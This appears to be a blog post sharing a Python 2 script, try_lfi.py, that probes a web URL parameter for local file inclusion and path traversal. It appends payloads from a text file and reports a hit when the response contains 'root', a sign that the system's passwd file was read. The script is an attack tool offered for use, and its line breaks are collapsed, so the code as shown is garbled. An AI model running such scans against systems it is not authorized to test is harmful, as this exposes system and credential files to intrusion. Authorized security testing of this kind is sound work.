As I wrote before, all of those 'modules' can be rewrited in one, bigger code.
Here is the code:
#!/usr/bin/env python # ---- # try_lfi.py - simple find if there is LFI vulnerability # ---- # - can be also used to find traversal-vulnerabilities # - tests can be extended to find more information than just passwd file. import urllib import sys #defines: url=sys.argv[1] checkLfis = open('LFItext.txt','r') try_lfi = checkLfis.readlines() if len(sys.argv) < 2: sys.stderr.write('usage: '+sys.argv[0]+' http://localhost/page?param=') sys.exit(1) else: print '---------------------------------------------------------------' print '[+] Searching for traversal/LFI vulnerability at URL: ', url print '---------------------------------------------------------------' i=0 for line in try_lfi: full_url_to_check = url+line try_page = urllib.urlopen(full_url_to_check) read_page = try_page.readlines() i=i+1 print 'Trying: ',line print 'Status: ', try_page.getcode() print '\t[~] Now reading the answer to '
print 'find out if there is our \'vulnerable-string\'...' for read_lines in read_page: if read_lines.find('root') != -1: print '\t[+] Found potential LFI bug! '
print 'This is the answer: ', read_lines print '---------------------------------------------------------------'
As you can read at this code, it's using a LFItext.txt file to search some
various strings. At module's source you will find how to use it against
some local-file include vulnerabilities.
Whole code is available also at pastebin.
Feedback is welcome ;)
Enjoy! o/
No comments:
Post a Comment
What do You think...?